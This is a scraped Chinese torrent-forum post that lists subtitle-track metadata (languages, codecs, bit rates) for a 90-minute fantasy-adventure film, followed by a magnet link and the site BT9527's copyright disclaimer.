  729. Language                                 : Spanish
  730. Default                                  : No
  731. Forced                                   : No
  732. Text #28
  733. ID                                       : 46
  734. Format                                   : UTF-8
  735. Codec ID                                 : S_TEXT/UTF8
  736. Codec ID/Info                            : UTF-8 Plain Text
  737. Duration                                 : 1 h 30 min
  738. Bit rate                                 : 32 b/s
  739. Count of elements                        : 746
  740. Stream size                              : 21.4 KiB (0%)
  741. Title                                    : Swedish
  742. Language                                 : Swedish
  743. Default                                  : No
  744. Forced                                   : No
  745. Text #29
  746. ID                                       : 47
  747. Format                                   : UTF-8
  748. Codec ID                                 : S_TEXT/UTF8
  749. Codec ID/Info                            : UTF-8 Plain Text
  750. Duration                                 : 1 h 30 min
  751. Bit rate                                 : 93 b/s
  752. Count of elements                        : 905
  753. Stream size                              : 62.1 KiB (0%)
  754. Title                                    : Thai
  755. Language                                 : Thai
  756. Default                                  : No
  757. Forced                                   : No
  758. Text #30
  759. ID                                       : 48
  760. Format                                   : UTF-8
  761. Codec ID                                 : S_TEXT/UTF8
  762. Codec ID/Info                            : UTF-8 Plain Text
  763. Duration                                 : 1 h 30 min
  764. Bit rate                                 : 34 b/s
  765. Count of elements                        : 857
  766. Stream size                              : 23.2 KiB (0%)
  767. Title                                    : Turkish
  768. Language                                 : Turkish
  769. Default                                  : Yes
  770. Forced                                   : No
  771. Text #31
  772. ID                                       : 49
  773. Format                                   : UTF-8
  774. Codec ID                                 : S_TEXT/UTF8
  775. Codec ID/Info                            : UTF-8 Plain Text
  776. Duration                                 : 1 h 30 min
  777. Bit rate                                 : 50 b/s
  778. Count of elements                        : 858
  779. Stream size                              : 33.4 KiB (0%)
  780. Title                                    : Ukrainian
  781. Language                                 : Ukrainian
  782. Default                                  : No
  783. Forced                                   : No
  784. Text #32
  785. ID                                       : 50
  786. Format                                   : UTF-8
  787. Codec ID                                 : S_TEXT/UTF8
  788. Codec ID/Info                            : UTF-8 Plain Text
  789. Duration                                 : 1 h 30 min
  790. Bit rate                                 : 45 b/s
  791. Count of elements                        : 769
  792. Stream size                              : 30.3 KiB (0%)
  793. Title                                    : Vietnamese
  794. Language                                 : Vietnamese
  795. Default                                  : No
  796. Forced                                   : No


TAGS 奇幻 冒险

磁力链:
  • magnet:?xt=urn:btih:310C0D7F63DC95D433C78EAD0DFF448173C6A549
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖